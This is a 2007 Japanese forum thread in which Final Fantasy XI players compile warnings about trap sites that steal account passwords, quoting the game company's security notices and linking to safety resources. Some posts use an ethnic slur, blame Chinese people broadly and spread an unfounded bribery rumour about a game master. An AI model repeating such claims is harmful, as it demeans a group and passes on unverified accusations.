フレにリネとかの警告サイト教えても、別ゲームのことだと思ってて反応薄いんだよね 手伝えることなら手伝うから作って欲しい
960 :既にその名前は使われています:2007/10/20(土) 12:35:28.82 ID:VBRDOltT
次スレ用のテンプレにでも
前スレ
中国人がFF系ブログに罠サイト張ってパス抜いてる
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1192376172/l50
[log]
関連スレ
RMT業者を通報しまくれ ver.4
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1191250500/l50
[log]
RMT業者、購入者BANおめでとう!Part39
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1192777121/l50
[log]
Wikiが業者に荒らされたら報告・修正するスレ
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1191823980/l50
[log]
961 :既にその名前は使われています:2007/10/20(土) 12:36:23.68 ID:Kv/pdDvf
ジョブwikiとかにもしこまれてたって上の方に書いてあったよ
(実情知らないけど)
962 :949:2007/10/20(土) 12:37:36.58 ID:MKNO1ls7
ありがとう。
ただ自分は正直に言ってあんまりPCとかウイルスとか詳しくなくて、提供された
情報の真贋は判断がつかない。
だから、スレ内で「これ載せて」って言われた情報を載せるだけのサイトしか作れない。
それでいいなら、これから場所借りてくる。
963 :既にその名前は使われています:2007/10/20(土) 12:42:08.47 ID:dBpbgqG7
■もユーザーも危機感が足りなさ過ぎる。
>>962
マジで応援してるお
964 :既にその名前は使われています:2007/10/20(土) 12:43:32.38 ID:h5GJcb5k
mixiのほうの罠コメントは、台湾人をけなすコメントなんだな。
まあ分かりやすいから良いけど、mixiはヌルい人が多いから
何人かは引っかかっているんだろうな〜
965 :テンプレ:2007/10/20(土) 12:56:00.89 ID:VBRDOltT
■<スパイウェアによる不正アクセスにご注意ください
現在、見知らぬ第三者によってプレイオンラインにログインされ、ファイナルファンタジーXIのアイテムやギルを
失ったり、キャラクターを削除されたりする被害が増加しています。
インターネット上には“ウイルス”や“スパイウェア”などと呼ばれるプログラムが存在しており、その種類によっては、
ファイルのダウンロードや、Webサイトの閲覧のみで感染するものも存在します。
最近プレイオンラインで確認されている不正アクセスの原因の1つとして、これらの悪意あるプログラムの影響が
考えられています。被害に遭わないための予防対策として、以下に代表的な例をご案内いたします。
・内容が不明なサイトにアクセスしない
・不明なサイトにあるソフトウェアのダウンロードを不用意に行わない
・Windows Updateを定期的に実行し、Windowsを常に最新の状態に保つ
※詳しくはマイクロソフト社の公式サイトをご覧ください。
・ご利用のWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する
・弊社が使用を認めていない外部プログラムを絶対に使用しない
・ウイルス駆除ソフトを常に最新のバージョンで使用する
大切なデータを守るために、プレイオンラインIDおよびプレイオンラインパスワードは厳重に管理していただくとともに、
ご利用のWindows PCやインターネット接続環境につきましても、適切な管理をいただけますよう、ご理解とご協力を
お願いいたします。
966 :既にその名前は使われています:2007/10/20(土) 13:00:36.21 ID:4jdy5Qap
予防はいいとして、やられてしまったときのスクウェア側の対応が書いてないな
被害者について一つも触れられてないのがワロスw
967 :既にその名前は使われています:2007/10/20(土) 13:03:03.48 ID:iGSd77K8
罠貼ってるのってRMTサイトなんだから
RMTサイト訴えるってわけにはいかんの?
968 :既にその名前は使われています:2007/10/20(土) 13:05:09.73 ID:nqyIWk3v
うちは知らない。
うちはやってない。
うちはクリーンなRMT^^。
って言い張るからムダじゃね。
つか、かなり前から■eの要望に対策してくれってメールしていたがこの程度の「対策」とはワロス
969 :既にその名前は使われています:2007/10/20(土) 13:06:08.78 ID:VBRDOltT
テンプレ
不正アクセス行為の禁止等に関する法律
http://wannabe.fam.cx/service/link.cgi?http://www.ipa.go.jp/security/ciadr/law199908.html
一年以下の懲役又は五十万円以下の罰金に処する
最近の事例
【社会】「テイルズウイーバー」に他人のIDで不正アクセス…方法は「2ちゃんねるで見た」 - 大阪の高校生逮捕
http://wannabe.fam.cx/service/link.cgi?http://news22.2ch.net/test/read.cgi/newsplus/1192699349/l50
[log]
970 :既にその名前は使われています:2007/10/20(土) 13:06:28.88 ID:iGSd77K8
ジョブのwikiならモンク四代目が現在進行形で荒らされてるらしい
971 :既にその名前は使われています:2007/10/20(土) 13:08:40.08 ID:nqyIWk3v
ああ、4代目は皆様の協力があってそこそこ業者の書き換えを即座に修正ができました。
ついこないだ4代目の中の人がヒョッコリ帰ってきてめでたく凍結されました。
ご協力ありがとうございました。
972 :既にその名前は使われています:2007/10/20(土) 13:09:39.78 ID:nqyIWk3v
追伸:今日?は獣wikiが書き換えられてたらしい。
973 :既にその名前は使われています:2007/10/20(土) 13:11:38.56 ID:F9Wtmzhz
中国人の不正アクセス増加でFF11終了か?
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1192642039/
[log]
次スレ立ててやったぞ
974 :既にその名前は使われています:2007/10/20(土) 13:12:57.19 ID:2UcT3DeJ
おー 949がんばれ。
452です。
自分は htmlでページ作る作業に耐えられないんで
あのあと内輪用にwikiでちょこちょこまとめてた。
今は警戒する人も多いだろうからどうしようかなと思ってたので よかった〜。
偏った内容で 専門的な用語認識には穴があることとは思うが
READONLY(編集できないモード)で 公開するので
よかったら 参考にしてください。
http://wannabe.fam.cx/service/link.cgi?http://miku.a.orn.jp/miku2/index.cgi
975 :既にその名前は使われています:2007/10/20(土) 13:13:25.48 ID:R1oj9GzP
ブログのコメント欄に貼られるのウザいわー
976 :既にその名前は使われています:2007/10/20(土) 13:13:26.32 ID:nqyIWk3v
>>973
俺のJaneじゃリンク先が「”ハリケーンおまんこタイフーンにゃ その3”」に見えるわけだが。
氏ね^^
977 :既にその名前は使われています:2007/10/20(土) 13:15:05.68 ID:F9Wtmzhz
中国人のパス抜き不正アクセス増加でFF11終了か?
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1192853688/
[log]
>>976
立てたぞ
978 :既にその名前は使われています:2007/10/20(土) 13:17:18.09 ID:VBRDOltT
テンプレ
Microsoft? Windows? 悪意のあるソフトウェアの削除ツール 最新版
http://wannabe.fam.cx/service/link.cgi?http://www.microsoft.com/downloads/thankyou.aspx?familyId=ad724ae0-e72d-4f54-9ab3-75b8eb148356&displayLang=ja
;
=================================
注意:ジョブwikiなどが業者に狙われています。
=================================
なんかアカウントハック目的の業者うざいのでネ実のマンパワーでFFXI系wikiをまもれ。
とりあえず現在、tinyurl系がうざい。 うっかり踏まないように。
あと一般のブログに見える業者のLivedoorブログページに一度飛ばし、
アルタナの神兵情報などを載せて「詳しくはこちら」からハックHPに飛ばす手法もある。
怪しいURLは先にこれで調べる!これが勝利のカギだ!
■aguse.net
http://wannabe.fam.cx/service/link.cgi?http://www.aguse.net/ ;
リネージュ資料室のセキュリティ対策
http://wannabe.fam.cx/service/link.cgi?http://lineage.nyx.bne.jp/misc/security/
;
979 :既にその名前は使われています:2007/10/20(土) 13:17:19.03 ID:nqyIWk3v
>>977が立てる気無いとおもって立てちまったじゃねぇか!!!
>>977 乙
中国人がFF系ブログに罠サイト張ってパス抜き 2
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1192853736/
[log]
980 :既にその名前は使われています:2007/10/20(土) 13:28:36.71 ID:VBRDOltT
とりあえず有用そうなのはまとめてみたが、あとなにかあるかな?
559の体験談とかもコピペしたほうがいいんかね
981 :既にその名前は使われています:2007/10/20(土) 13:36:39.81 ID:AUhWncY6
日 時:2007年10月23日(火) 17:00頃
対 象:プレイオンラインビューアーをご利用のお客様
【主な変更内容】
■プレイオンラインパスワードがプレインオンラインIDと同じ文字
列、もしくは8文字未満である場合、ログイン時にプレイオンラ
インパスワードの変更画面が表示されるよう変更。
※上記条件に該当するプレイオンラインパスワードをご使用の間は
プレイオンラインへログインするたびにパスワードの変更画面が
表示されます。プレイオンラインアカウント保護のためにも、プ
レイオンラインパスワードを早急にご変更くださいますようお願
いいたします。
982 :949:2007/10/20(土) 13:48:56.12 ID:MKNO1ls7
949です。
とりあえず場所だけ借りて来た。
http://wannabe.fam.cx/service/link.cgi?http://ffff.ojaru.jp/f/top.htm
申し訳ないがこれから出かけなければいけないので、一旦落ちます。
夜には帰ってこられると思うので、載せたい情報があればどんどん
投下しておいて下さいm(_ _)m
983 :既にその名前は使われています:2007/10/20(土) 13:49:20.13 ID:usm+Injf
Luckshop
フレの装備を売りさばいたキャラ名
未だに元気に活動しています
984 :既にその名前は使われています:2007/10/20(土) 13:51:48.64 ID:fRhVA58F
>>983
そのキャラのログ辿れば簡単に不正アクセスの証拠とれると思うんだがなあ
素人考えでしょうか
985 :既にその名前は使われています:2007/10/20(土) 13:52:54.99 ID:nqyIWk3v
[+]くろけっちん<普通のキャラクター同士のアイテム・ギル受け渡しにしか見えません。
986 :既にその名前は使われています:2007/10/20(土) 13:53:38.69 ID:SB9lHQF3
泳がせて金の流れごと根こそぎBANするつもりなんじゃね?
987 :既にその名前は使われています:2007/10/20(土) 13:54:24.30 ID:VBRDOltT
Luckshopの目撃情報とかもあったら書いてほしい
サーチはしてるが引っかからないのよね
また故売担当が、これだけとも思えないし新キャラを投入してくる可能性も高いので
FFAHも活用しないとね
988 :既にその名前は使われています:2007/10/20(土) 14:12:40.38 ID:MIfGExyo
不正アクセスは犯罪だが他人のキャラからアイテム盗んだり渡したりすること自体は犯罪じゃない。(ゲームの中で)
Luckshopを誰が動かしてようが関係が無い。
パス抜かれたキャラを他人が動かしてる証拠を抑えないと。
989 :既にその名前は使われています:2007/10/20(土) 14:20:20.63 ID:VBRDOltT
IP見れるのは■だけなんだが…
俺らは接続記録と契約者個人のアリバイくらいしかだせるもんないぞ
990 :既にその名前は使われています:2007/10/20(土) 14:22:21.23 ID:nqyIWk3v
あやしいヤツのIPを次々遮断しる
991 :既にその名前は使われています:2007/10/20(土) 14:25:48.65 ID:MIfGExyo
今回の騒ぎでサービス提供外地域のIP遮断してくれるといいんだが、あまり期待できないな。
992 :既にその名前は使われています:2007/10/20(土) 14:26:37.22 ID:95VriavP
ROとかであったが、業者一人につき50万とか貰ってるそうだ。
業者は一人じゃないから合計したら200万越えるとかなんとか
くろけっちんはシナ業者から賄賂受け取ってるんじゃないか?
993 :既にその名前は使われています:2007/10/20(土) 14:29:09.72 ID:VBRDOltT
被害を抑えるにはゲストログイン廃止するしかないよ
暗号化も碌にしてないみたいだし